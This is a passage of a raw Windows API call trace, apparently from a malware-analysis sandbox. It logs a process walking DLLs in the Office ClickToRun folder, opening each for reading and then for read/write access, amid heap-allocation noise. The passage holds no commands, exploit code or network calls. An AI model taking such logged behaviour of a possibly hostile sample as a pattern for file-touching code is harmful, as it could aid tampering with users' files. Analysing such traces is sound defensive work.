lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.566] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.567] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.567] CloseHandle (hObject=0x430) returned 1 [0077.567] AreFileApisANSI () returned 1 [0077.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0077.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 80 [0077.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.567] GetLastError () returned 0x20 [0077.567] GetLastError () returned 0x20 [0077.567] SetLastError (dwErrCode=0x20) [0077.567] GetLastError () returned 0x20 [0077.567] SetLastError (dwErrCode=0x20) [0077.567] GetLastError () returned 0x20 [0077.567] SetLastError (dwErrCode=0x20) [0077.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x13c4d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVPolicy.dll", cAlternateFileName="APPVPO~1.DLL")) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.568] AreFileApisANSI () returned 1 [0077.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll", lpUsedDefaultChar=0x0) returned 73 [0077.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0077.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0077.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0077.569] AreFileApisANSI () returned 1 [0077.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0077.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0077.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 73 [0077.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.569] GetFileType (hFile=0x430) returned 0x1 [0077.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0077.569] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.569] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.570] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.570] CloseHandle (hObject=0x430) returned 1 [0077.570] AreFileApisANSI () returned 1 [0077.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0077.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x853a0 [0077.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 73 [0077.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.570] GetLastError () returned 0x20 [0077.570] GetLastError () returned 0x20 [0077.570] SetLastError (dwErrCode=0x20) [0077.570] GetLastError () returned 0x20 [0077.570] SetLastError (dwErrCode=0x20) [0077.570] GetLastError () returned 0x20 [0077.570] SetLastError (dwErrCode=0x20) [0077.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0077.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0077.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0077.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVScripting.dll", cAlternateFileName="APPVSC~1.DLL")) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.571] AreFileApisANSI () returned 1 [0077.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", lpUsedDefaultChar=0x0) returned 76 [0077.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0077.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.574] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0077.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0077.574] AreFileApisANSI () returned 1 [0077.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0077.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85760 [0077.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0077.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.575] GetFileType (hFile=0x430) returned 0x1 [0077.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0077.575] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.575] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.575] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.575] CloseHandle (hObject=0x430) returned 1 [0077.576] AreFileApisANSI () returned 1 [0077.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85a80 [0077.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85a80, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0077.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.576] GetFileType (hFile=0x430) returned 0x1 [0077.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85a80 | out: hHeap=0x20000) returned 1 [0077.576] CloseHandle (hObject=0x430) returned 1 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0077.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0077.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0077.578] AreFileApisANSI () returned 1 [0077.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0077.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x856c0 [0077.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0077.578] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8)) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0077.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 